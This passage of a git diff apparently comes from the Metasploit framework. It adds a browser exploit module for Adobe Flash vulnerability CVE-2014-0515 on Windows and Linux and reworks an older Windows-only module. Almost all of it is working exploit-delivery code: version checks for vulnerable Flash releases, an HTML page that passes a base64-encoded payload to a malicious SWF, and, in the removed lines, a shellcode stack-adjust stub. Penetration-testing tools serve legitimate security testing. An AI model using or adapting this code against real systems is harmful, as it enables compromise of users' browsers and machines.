+              return true if ver =~ /^12\./
+              return true if ver =~ /^13\./ && Gem::Version.new(ver) <= Gem::Version.new('13.0.0.182')
+            when 'Linux'
+              return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.350')
+            end
+
+            false
+          end
+        },
+      'Targets' =>
+        [
+          [ 'Windows',
+            {
+              'Platform' => 'win'
+            }
+          ],
+          [ 'Linux',
+            {
+              'Platform' => 'linux'
+            }
+          ]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => 'Apr 28 2014',
+      'DefaultTarget'  => 0))
+  end
+
+  def exploit
+    @swf = create_swf
+    super
+  end
+
+  def on_request_exploit(cli, request, target_info)
+    print_status("Request: #{request.uri}")
+
+    if request.uri =~ /\.swf$/
+      print_status('Sending SWF...')
+      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
+      return
+    end
+
+    print_status('Sending HTML...')
+    send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
+  end
+
+  def exploit_template(cli, target_info)
+    swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
+    target_payload = get_payload(cli, target_info)
+    b64_payload = Rex::Text.encode_base64(target_payload)
+    os_name = target_info[:os_name]
+
+    if target.name =~ /Windows/
+      platform_id = 'win'
+    elsif target.name =~ /Linux/
+      platform_id = 'linux'
+    end
+
+    html_template = %Q|<html>
+    <body>
+    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
+    <param name="movie" value="<%=swf_random%>" />
+    <param name="allowScriptAccess" value="always" />
+    <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
+    <param name="Play" value="true" />
+    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
+    </object>
+    </body>
+    </html>
+    |
+
+    return html_template, binding()
+  end
+
+  def create_swf
+    path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2014-0515', 'msf.swf' )
+    swf =  ::File.open(path, 'rb') { |f| swf = f.read }
+
+    swf
+  end
+
+end
diff --git a/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb b/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb
index 4e54893877..48b2268ad1 100644
--- a/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb
+++ b/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb
@@ -9,10 +9,13 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::BrowserExploitServer
+  include Msf::Module::Deprecated
+
+  deprecated(Date.new(2015, 8, 11), 'exploit/multi/browser/adobe_flash_uncompress_zlib_uaf')
 
   def initialize(info={})
     super(update_info(info,
-      'Name'           => "Adobe Flash Player Shader Buffer Overflow",
+      'Name'           => 'Adobe Flash Player Shader Buffer Overflow',
       'Description'    => %q{
         This module exploits a buffer overflow vulnerability in Adobe Flash Player. The
         vulnerability occurs in the flash.Display.Shader class, when setting specially
@@ -36,16 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote
         ],
       'Payload'        =>
         {
-          'Space' => 2000,
-          'DisableNops' => true,
-          'PrependEncoder' => stack_adjust
-        },
-      'DefaultOptions'  =>
-        {
-          # Disabled by default to allow sessions on Firefox, still useful when exploiting IE
-          #'InitialAutoRunScript' => 'migrate -f',
-          'Retries'              => false,
-          'EXITFUNC'             => "thread"
+          'DisableNops' => true
         },
       'Platform'       => 'win',
       'BrowserRequirements' =>
@@ -60,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote
           [ 'Automatic', {} ]
         ],
       'Privileged'     => false,
-      'DisclosureDate' => "Apr 28 2014",
+      'DisclosureDate' => 'Apr 28 2014',
       'DefaultTarget'  => 0))
   end
 
@@ -69,48 +63,34 @@ class Metasploit3 < Msf::Exploit::Remote
     super
   end
 
-  def stack_adjust
-    adjust = "\x64\xa1\x18\x00\x00\x00"  # mov eax, fs:[0x18 # get teb
-    adjust << "\x83\xC0\x08"             # add eax, byte 8 # get pointer to stacklimit
-    adjust << "\x8b\x20"                 # mov esp, [eax] # put esp at stacklimit
-    adjust << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # plus a little offset
-
-    adjust
-  end
-
   def on_request_exploit(cli, request, target_info)
     print_status("Request: #{request.uri}")
 
     if request.uri =~ /\.swf$/
-      print_status("Sending SWF...")
+      print_status('Sending SWF...')
       send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
       return
     end
 
-    print_status("Sending HTML...")
-    tag = retrieve_tag(cli, request)
-    profile = get_profile(tag)
-    profile[:tried] = false unless profile.nil? # to allow request the swf
+    print_status('Sending HTML...')
     send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
   end
 
   def exploit_template(cli, target_info)
     swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
-    flash_payload = ""
-    get_payload(cli,target_info).unpack("V*").each do |i|
-      flash_payload << "0x#{i.to_s(16)},"
-    end
-    flash_payload.gsub!(/,$/, "")
-
+    target_payload = get_payload(cli, target_info)
+    b64_payload = Rex::Text.encode_base64(target_payload)
+    os_name = target_info[:os_name]
+    platform_id = 'win'
 
     html_template = %Q|<html>
     <body>
     <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
     <param name="movie" value="<%=swf_random%>" />
     <param name="allowScriptAccess" value="always" />
-    <param name="FlashVars" value="sh=<%=flash_payload%>" />
+    <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
     <param name="Play" value="true" />
-    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=flash_payload%>" Play="true"/>
+    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
     </object>
     </body>
     </html>
@@ -120,7 +100,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def create_swf
-    path = ::File.join( Msf::Config.data_directory, "exploits", "CVE-2014-0515", "Graph.swf" )
+    path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2014-0515', 'msf.swf' )
     swf =  ::File.open(path, 'rb') { |f| swf = f.read }
 
     swf